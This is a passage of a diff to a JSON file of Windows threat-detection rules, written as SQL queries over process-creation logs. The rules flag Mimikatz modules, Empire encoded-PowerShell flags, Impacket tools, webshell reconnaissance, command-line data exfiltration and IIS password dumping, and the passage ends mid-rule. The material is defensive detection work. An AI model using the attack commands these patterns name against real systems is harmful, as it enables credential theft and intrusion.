'%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + 
"attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": 
"9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE 
'\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": 
"Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from 
other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - 
ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE 
'\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in 
temporary folders or folders accessible by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE 